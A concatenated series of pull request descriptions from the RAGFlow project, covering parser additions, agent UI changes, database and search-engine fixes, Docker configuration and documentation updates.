- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Support a local MinerU API from a Docker instance, for example when WSL on
Windows has no GPU but a MinerU API with GPU support is available.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: opensearch retrieval error #10828
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add German translations for all agent templates and optimize line breaks
in the titles for the new translation.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Allow other operators to reference the structured output defined
by the agent operator. #10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Added SVR_WEB_HTTP_PORT=80, SVR_WEB_HTTPS_PORT=443, and
SVR_MCP_PORT=9382 to the Docker environment configuration to support
standard web ports and Model Context Protocol (MCP) access.
### Type of change
- [x] Update config
### What problem does this PR solve?
This commit removes the Youdao and BAAI entries from the LLM factories
configuration as they are no longer needed or supported.
### Type of change
- [x] Config update
### What problem does this PR solve?
Feat: Configure structured data output for agent forms #10866
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add 'how to access login UI and admin UI'.
### Type of change
- [x] Documentation Update
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
The admin client default port is currently '8080'; update it to '9381'.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Allow initializing Redis without a password.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Updated test cases in test_retrieval_chunks.py to:
- Remove skip mark from page pagination test case (#6646 resolved)
- Add skip marks for page_size=1 tests due to new issue (#10692)
### Type of change
- [x] Test update
### What problem does this PR solve?
Remove 'DID YOU KNOW' when starting the front end.
### Type of change
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: Refactor the similarity slider component and modify the style of
the dataset-test page
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the style of the agent operator form tool #10703
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Add time utilities and unit tests
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
issue:
#10825
change:
remove unexpected keyword argument in table_structure_recognizer logging
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- rename rmSpace to remove_redundant_spaces
- move clean_markdown_block to common module
- add unit tests for remove_redundant_spaces and clean_markdown_block
### Type of change
- [x] Refactoring
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: parsing excel with chartsheet #10815
Fix: Clamp begin to a minimum of 0 to prevent negative indexing #10804
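The clamping fix can be illustrated with a generic sketch. This is not the code from the PR: the function names and the windowing scenario are hypothetical, and only the idea of clamping `begin` to 0 comes from the description above. In Python, a negative slice start counts from the end of the sequence, so an unclamped `begin` can silently return the wrong (often empty) range.

```python
def context_window_unclamped(items, center, radius):
    # Hypothetical helper: begin can go negative when center < radius.
    begin = center - radius
    end = center + radius + 1
    # A negative begin is interpreted as an offset from the end of the list.
    return items[begin:end]


def context_window_clamped(items, center, radius):
    # Same helper with begin clamped to a minimum of 0.
    begin = max(0, center - radius)
    end = center + radius + 1
    return items[begin:end]
```

With `items = list("abcdef")`, `center=1` and `radius=2`, the unclamped version slices `items[-1:4]`, which is empty, while the clamped version returns the first four items.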
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the style of the agent operator form #10703
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: bug fixes and icon replacement #10703
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[#10789](https://github.com/infiniflow/ragflow/issues/10789)
change:
All-in-one MinerU and Docling
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Adjust the style of the toolbar at the bottom of the agent canvas
#10703
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
MinerU supports the VLM-Transformers backend.
Set `MINERU_BACKEND="pipeline"` to choose the backend. (Options:
pipeline | vlm-transformers; the default is pipeline.)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Home and team page style adjustment, and some bug fixes #10703
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR adds a new TCADP (Tencent Cloud Advanced Document Processing)
parser to RAGFlow, enabling users to leverage Tencent Cloud's document
parsing capabilities for more accurate and structured document
processing. The implementation includes:
- New TCADP Parser: A complete implementation of Tencent Cloud's document
parsing API without SDK dependency
- Configuration Support: Added configuration options in service_conf.yaml
for Tencent Cloud API credentials
- Frontend Integration: Updated UI components to support the new TCADP
parser option
- Error Handling: Comprehensive error handling and retry mechanisms for
API calls
- Result Processing: Support for both SSE streaming and JSON response
formats from Tencent Cloud API
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fixed the bug that the "dataset_ids" field will not be updated if an
empty array is passed when updating the assistant
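One common way this kind of bug arises is a truthiness check that treats an empty list the same as a missing field. The sketch below is an assumption about the general pattern, not the actual RAGFlow handler; the function names and the dict-based `assistant` are hypothetical.

```python
def apply_update_truthy(assistant, payload):
    # Hypothetical buggy variant: [] is falsy, so an empty list is ignored.
    updated = dict(assistant)
    if payload.get("dataset_ids"):
        updated["dataset_ids"] = payload["dataset_ids"]
    return updated


def apply_update_explicit(assistant, payload):
    # Hypothetical fixed variant: only a missing or None field is skipped,
    # so an empty list clears the existing dataset_ids.
    updated = dict(assistant)
    if payload.get("dataset_ids") is not None:
        updated["dataset_ids"] = payload["dataset_ids"]
    return updated
```

Passing `{"dataset_ids": []}` leaves the old IDs in place in the first variant and clears them in the second.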
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Could not delete Entity Types from the Knowledge Graph settings. The
list was not updated on pressing the X on a tag.
What I think happened:
- `value={field}` was passing `['parser_config','entity_types']` to
`EditTag` instead of the real tags.
- That blocked AntD Form from injecting the right `value`/`onChange`.
- Clicking X filtered the wrong "value," so no visible change.
Fix:
- Remove `value={field}` and let `Form.Item` control `EditTag`.
- `EditTag` now gets the real tags array and emits `onChange(tags)`, and
Form captures it.
Now it works.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the style of the canvas node #10703
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue where dataset log avatars were displayed
incorrectly #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: prioritize synonym matches over WordNet for English
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Introduced gpu profile in .env
- Added Dockerfile_tei
- Fixed datrie
- Removed LIGHTEN flag
### Type of change
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Move some test files to test/testcases
### Type of change
- [x] Refactoring
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
issue:
#3945
change:
add Docling parser
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.21.0 to v0.21.1
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Clicking "Stop receiving messages" in Firefox will cause the page
to crash. #10752
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: The default value of the parser operator's Video output format is
set to text #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Bump infinity to 0.6.1
#10727 missed `docker/docker-compose-base.yml`.
### Type of change
- [x] Other (please describe):
### What problem does this PR solve?
Fix: Resolved the issue where the Generate button must be refreshed
after generating chunk to take effect
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add suffix to the parser operator's video configuration #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Pipeline supports MinerU PDF parser.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that filename is not displayed on the overview
page; and added the processing logic of the generate button when chunk=0
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Update version, and remove '_canvas' suffix in agent_category.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display the video field in the parser operator #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix: Optimize the style of the personal center sidebar component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: can't upload image in ollama model #10447
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### Change all `images=[]` to `images=None`
Changing `images=[]` to `images=None` avoids Python's mutable default
parameter issue.
If you keep `images=[]`, all calls share the same list, so modifying it
(e.g., `images.append()`) will affect later calls.
Using images=None and creating a new list inside the function ensures
each call is independent.
This change does not affect current behavior — it simply makes the code
safer and more predictable.
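The pitfall can be reproduced with a small, self-contained sketch. The function names below are hypothetical and are not the ones changed in this PR; only the `images=[]` versus `images=None` pattern comes from the description above.

```python
def collect_shared(item, images=[]):
    # The default list is created once, when the function is defined,
    # and is then shared by every call that omits `images`.
    images.append(item)
    return images


def collect_independent(item, images=None):
    # A fresh list is created on each call that omits `images`.
    if images is None:
        images = []
    images.append(item)
    return images
```

Calling `collect_shared("a")` and then `collect_shared("b")` returns a list containing both items on the second call, while `collect_independent` returns a one-element list each time.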
### What problem does this PR solve?
Feat: Adjust the style of the mcp dialog #10703
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add fault-tolerant mechanism to GraphRAG. #10406.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Change the style of all cards according to the design #10703
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix potential negative max_tokens in RAPTOR. #10235.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Move the pipeline translation field to flow #9869
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: A pipeline's child node can only have one node #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Updated test cases in test_retrieval_chunks.py to:
- Remove skip mark from page pagination test case (issues/6646 resolved)
- Add skip marks for page_size=1 tests due to new issue (issues/10692)
### Type of change
- [x] Test
### What problem does this PR solve?
Feat: Display the pipeline operation sheet on the agent page #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Make knowledge base renaming automatically reflected in agent
discussions, solved #10597
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Support attribute filtering #8703
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
Co-authored-by: writinwaters <cai.keith@gmail.com>
### What problem does this PR solve?
issue:
[#9272](https://github.com/infiniflow/ragflow/issues/9272)
change:
setting metadata in the retrieval
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix(edit-tag): Fix the bug that the edit-tag tag cannot be deleted #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[#7472](https://github.com/infiniflow/ragflow/issues/7472)
change:
Vision Model Image Enhancement in Manual chunker
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Qwen-VL series supports video parsing. #10617.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Optimize code and fix ts type errors #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The agent dialogue sheet does not display the opening remarks.
#10664
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Remove pdf embed support, update based on #10635
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Add comprehensive RBAC support with role and permission management
- Implement CREATE/ALTER/DROP ROLE commands for role lifecycle
management
- Add GRANT/REVOKE commands for fine-grained permission control
- Support user role assignment via ALTER USER SET ROLE command
- Add SHOW ROLE and SHOW USER PERMISSION for permission inspection
- Implement corresponding RESTful API endpoints for role management
- Integrate role commands into existing command execution framework
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: Text color in Floating Widget (Intercom-style) #10624
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display the pipeline on the agent canvas #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Parsing now supports all types of embedded documents, solved #10059
Fix: Incomplete words in chat #10530
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Restore the sidebar description of DP slicing method #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete useless files from the data pipeline #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
[#9004](https://github.com/infiniflow/ragflow/issues/9004)
change:
VolcEngine Model type add IMAGE2TEXT
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
feat(storybook): Storybook with Calendar and Modal components #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Clear agents display, remove empty value column.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add MinerU parser. #3945, #8092.
Set `MINERU_EXECUTABLE` to the MinerU executable path, defaults to
`mineru`.
Set `MINERU_DELETE_OUTPUT=0` to preserve MinerU's output, default is 1,
which deletes temporary output.
Set `MINERU_OUTPUT_DIR` to choose the MinerU output directory (uses the
temporary directory if unset).
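As a rough sketch of how these three variables could be read, assuming nothing about the real parser code: `load_mineru_settings` is a hypothetical helper, treating any value other than `0` as "delete" is an assumption, and `tempfile.gettempdir()` is an assumed stand-in for "the temporary directory".

```python
import os
import tempfile


def load_mineru_settings(env=None):
    # Hypothetical helper; reads from os.environ unless a mapping is given.
    env = os.environ if env is None else env
    return {
        # Path to the MinerU executable, defaulting to `mineru`.
        "executable": env.get("MINERU_EXECUTABLE", "mineru"),
        # Default is 1 (delete temporary output); 0 preserves it.
        "delete_output": env.get("MINERU_DELETE_OUTPUT", "1") != "0",
        # Fall back to a temporary directory when unset (assumed location).
        "output_dir": env.get("MINERU_OUTPUT_DIR") or tempfile.gettempdir(),
    }
```

Passing a plain dict instead of the real environment keeps the helper easy to check in isolation.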
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Open the parser operator configuration, save it, and run the agent.
An error will be reported. #10615
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: add forgot password reset (update naming style), solve #8547
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The bottom anchor of the agent node is only displayed when there
is a downstream node #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Bug fixes #9869
- Added the disabled attribute to control the modal confirmation button
state
- Conditionally rendered the catalog enhancement toggle component
- Replaced the selector component and removed unused imports
- Removed redundant catalog enhancement text in the Chinese language
pack
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Collapse the excess portion of the tool node and retrieval node
#9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
## What problem does this PR solve?
Fixes the PostgreSQL connection error that prevents RAGFlow from
starting:
`peewee.ProgrammingError: invalid dsn: invalid connection option "max_retries"`
## Problem Analysis
The `BaseDataBase` class in `api/db/db_models.py` adds `max_retries` and
`retry_delay` to the database configuration dict before passing it to
the database connection constructor.
- **MySQL**: Has `RetryingPooledMySQLDatabase` class that properly
extracts these custom parameters using `kwargs.pop()` before calling the
parent constructor
- **PostgreSQL**: Was using the base `PooledPostgresqlDatabase` class
which passes all parameters directly to `psycopg2.connect()`, which
doesn't recognize `max_retries` as a valid connection option
## Solution
Created `RetryingPooledPostgresqlDatabase` class that:
- Extracts `max_retries` and `retry_delay` parameters before
initialization
- Implements retry logic with exponential backoff for connection
failures
- Handles PostgreSQL-specific connection errors (connection refused,
server closed, etc.)
- Mirrors the existing `RetryingPooledMySQLDatabase` implementation
Updated the `PooledDatabase` enum to use the new retrying class for
PostgreSQL.
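The pattern described above can be sketched without a real database. This is not the RAGFlow implementation: `DriverDatabase` is a hypothetical stand-in for a driver-backed class that rejects unknown connection options (as `psycopg2.connect()` does), and the default values and the use of `ConnectionError` are assumptions made for illustration.

```python
import time


class DriverDatabase:
    """Hypothetical stand-in for a database class that forwards all
    keyword arguments to a driver which rejects unknown options."""

    ALLOWED = {"host", "port", "user", "password"}

    def __init__(self, name, **kwargs):
        unknown = sorted(set(kwargs) - self.ALLOWED)
        if unknown:
            raise ValueError(f'invalid connection option "{unknown[0]}"')
        self.name = name
        self.connect_params = kwargs
        self.attempts = 0
        self.fail_first = 0  # number of simulated failures before success

    def connect(self):
        self.attempts += 1
        if self.attempts <= self.fail_first:
            raise ConnectionError("connection refused")
        return True


class RetryingDatabase(DriverDatabase):
    def __init__(self, *args, **kwargs):
        # Pop the custom options so they never reach the driver.
        self.max_retries = kwargs.pop("max_retries", 5)
        self.retry_delay = kwargs.pop("retry_delay", 1)
        super().__init__(*args, **kwargs)

    def connect(self):
        for attempt in range(self.max_retries + 1):
            try:
                return super().connect()
            except ConnectionError:
                if attempt == self.max_retries:
                    raise
                # Exponential backoff: delay, 2*delay, 4*delay, ...
                time.sleep(self.retry_delay * (2 ** attempt))
```

Constructing `DriverDatabase` directly with `max_retries=3` raises the "invalid connection option" error, while `RetryingDatabase` accepts it and retries failed connections.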
## Benefits
- ✅ Prevents invalid connection parameters from being passed to psycopg2
- ✅ Adds automatic retry logic for PostgreSQL connection failures
- ✅ Provides better error logging for PostgreSQL-specific issues
- ✅ Maintains consistency between MySQL and PostgreSQL database handling
## Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
## Testing
Tested with PostgreSQL database configuration and verified:
- Server starts without the "invalid dsn" error
- Database connections are established successfully
- Retry logic works correctly on connection failures
Co-authored-by: Andrea Bugeja <andrea.bugeja@gig.com>
### What problem does this PR solve?
Feat: add forgot password reset, solve #8547
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
1. Update architecture image
2. ragflow-cli doesn't indicate the version
### Type of change
- [x] Documentation Update
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
- Added new field 'toc_kwd' to infinity_mapping.json for table of
contents keyword support
- Changed page_num_int from integer to array type in task_executor.py to
handle multiple page numbers
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix (dataset setting): Remove the introduction and use of TagItems in
the configuration. #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
issue:
[#5787](https://github.com/infiniflow/ragflow/issues/5787)
change:
Support Specifying OpenRouter Model Provider
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Improve file management. #10287.
Passed tests:
1. Create folder `A` and `B`.
2. Upload a file inside `A`, called `file`.
3. Create a KB, called `K`.
4. Link `file` to `K`.
5. Parse `file` inside of `K`. (OK)
6. Move `file` from `A` to `B`.
7. Parse `file` inside of `K`. (OK)
8. Move `file` from `B` to `A`.
9. Parse `file` inside of `K`. (OK)
10. Move entire folder `A` into `B`. (B -> A -> file)
11. Parse `file` inside of `K`. (OK)
12. Delete folder `B`.
13. All clear. (There is no document inside of `K`)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Reranking is not needed for Infinity, since Infinity normalizes the
score of each retrieval path before fusion.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Fix (i18n): Update the Chinese and English description of RAPTOR
functionality #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Since `description_list` was a tuple containing a single element (which
was the actual list of descriptions), `len(description_list)` was always
**1**.
The subsequent check:
`if len(description_list) <= 12:` always evaluated to `True` (since $1
\le 12$), even if the inner list contained more than 12 descriptions.
This prevented the necessary summarization logic from running for long
lists.
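The effect is easy to reproduce in isolation. In the sketch below, `can_skip_summary` and the sample data are hypothetical; only the threshold of 12 and the tuple-wrapping behaviour come from the description above.

```python
# Twenty descriptions: more than the threshold, so summarization is needed.
descriptions = [f"description {i}" for i in range(20)]

# A one-element tuple whose only item is the real list.
wrapped = (descriptions,)


def can_skip_summary(description_list, threshold=12):
    # Mirrors the `len(description_list) <= 12` check quoted above.
    return len(description_list) <= threshold
```

Here `can_skip_summary(wrapped)` is true because the tuple has length 1, whereas `can_skip_summary(wrapped[0])` is false because the inner list has 20 entries.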
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
As title.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Fix: Optimize metadata filters, add Ingestion pipeline options to agent
templates page
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Creating a data flow from a template page #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.5 to v0.21.0
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Click the reset button on the agent page shared externally, and the
greeting in conversation mode should not be deleted. #10567
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Create Stock_research_report.json
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Adding Ingestion Pipeline Classification to Agents Template #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: When I click to interrupt the chat, the page reports an error
#10553
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Switch the default theme from light mode to dark mode and improve
some styles #9869
- Update UI component styles such as input boxes, tables, and prompt
boxes
- Optimize login page layout and style details
- Revise some of the wording, such as uniformly changing "data flow" to
"pipeline"
- Adjust the parser to support the markdown type
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Adjust the style of note nodes #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Merge splitter and hierarchicalMerger into one node #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
To make the CLI easy to use.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Update the parsing editor to support dynamic field names and
optimize UI styles #9869
- Modify the default background color of UI components such as Input and
Select to 'bg bg base'
- Remove TagItems component reference from naive configuration page
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Display the configuration of data flow operators on the node #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add the Kibana tool to the docker compose file (#10525)
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: virgilwong <hyhvirgil@gmail.com>
### What problem does this PR solve?
issue:
#10495
change:
fix empty references in agent conversation
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Solved: Sync Parse Document API #5635
Feat: Add parse_document with feedback; users can view the status of
each document after parsing finishes.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
### What problem does this PR solve?
Fix: XSS vulnerability in RAGFlow's chat view
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Merge title splitter and token splitter into chunker category
#9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Optimized the login page and fixed some known issues. #9869
- Added the FlipCard3D component to implement a 3D flip effect on the
login/registration forms.
- Adjusted the Spotlight component to support custom positioning and
color configurations.
- Updated the route to point to the new login page /login-next.
- Added a cancel interface to the auto-generate function.
- Fixed scroll bar issues in PDF preview.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: The Context Generator node can only be followed by a Tokenizer and
a Context Generator. #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Update lm studio models support, refer to #8116
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Documentation Update
### What problem does this PR solve?
issue:
[#10296](https://github.com/infiniflow/ragflow/issues/10296)
change:
- ExeSQL: support connecting to Trino.
- Validation: password can be empty only when db_type === "trino";
all other database types keep the existing requirement (non-empty).
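The validation rule can be expressed as a small predicate. This is a minimal Python sketch of the rule as stated, not the form validation code from the PR; `is_password_valid` is a hypothetical name.

```python
def is_password_valid(db_type, password):
    # Trino connections may omit the password entirely.
    if db_type == "trino":
        return True
    # Every other database type keeps the non-empty requirement.
    return bool(password)
```

An empty password is accepted only for `"trino"`; for any other `db_type` it is rejected.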
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Maintain backward compatibility for KB tasks
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the background color of the canvas #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fixes issue: https://github.com/infiniflow/ragflow/issues/10402
Newly released embedding models support vector dimensions up to 4096,
while the current OpenSearch support tops out at 1536 dimensions.
In my tests, a 4096-dimension vector was treated as a float type, which
is unacceptable in OpenSearch.
Besides, OpenSearch supports up to 16000 dimensions by default with the
Faiss vector engine, according to:
https://docs.opensearch.org/2.19/field-types/supported-field-types/knn-methods-engines/
I added support for up to 10240 dimensions in OpenSearch, which I think
will be sufficient for the future.
In my tests, it worked well on my own server (vectors were treated as
knn_vector) using qwen3-embedding:8b as the embedding model:
<img width="1338" height="790" alt="image"
src="https://github.com/user-attachments/assets/a9b2d284-fcf6-4cea-859a-6aadccf36ace"
/>
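For illustration, a `knn_vector` field mapping for a given dimension could be built as follows. This is a sketch under assumptions, not the mapping file changed in this PR: the `q_<dim>_vec` field naming and the helper name are hypothetical, and the 16000 limit is the figure quoted above for the Faiss engine.

```python
MAX_FAISS_DIMENSION = 16000  # limit quoted above for the Faiss engine


def knn_vector_properties(dimensions):
    # Build one knn_vector field per embedding dimension (hypothetical naming).
    properties = {}
    for dim in dimensions:
        if not 1 <= dim <= MAX_FAISS_DIMENSION:
            raise ValueError(f"unsupported vector dimension: {dim}")
        properties[f"q_{dim}_vec"] = {"type": "knn_vector", "dimension": dim}
    return {"properties": properties}
```

For example, `knn_vector_properties([1536, 4096])` yields explicit `knn_vector` fields for both sizes, so a 4096-dimension embedding is not left to dynamic mapping.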
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
By the way, I will still focus on the stuff about
Elasticsearch/Opensearch as search engines and vector databases.
Co-authored-by: 张雨豪 <zhangyh80@chinatelecom.cn>
### What problem does this PR solve?
Fix: Added table of contents extraction functionality and optimized form
item layout #9869
- Added `EnableTocToggle` component to toggle table of contents
extraction on and off
- Added multiple parser configuration components (such as naive, book,
laws, etc.), displaying different parser components based on built-in
slicing methods
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the default style of the agent node anchor #9869
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
issue:
[#6571](https://github.com/infiniflow/ragflow/issues/6571)
change:
include author, journal name, volume, issue, page, and DOI in PubMed
search results
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Refactor(login): Refactor the login page and add dynamic background and
highlight effects #9869
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Fix: Fixed the issue where the connection lines of placeholder nodes in
the agent canvas could not be displayed #9869
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Gemini 2.5 Flash models use reasoning by default. There is currently no
way to disable this behaviour, which leads to very long response times
(> 1 min). By default, reasoning should be disabled, and it should be
configurable.
Issue #10474
### Type of change
- [X] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes the return type annotation for the `get_urls` function in
`download_deps.py`
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Agent.reset() argument wrong #10463 & Unable to converse with agent
through Python API. #10415
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
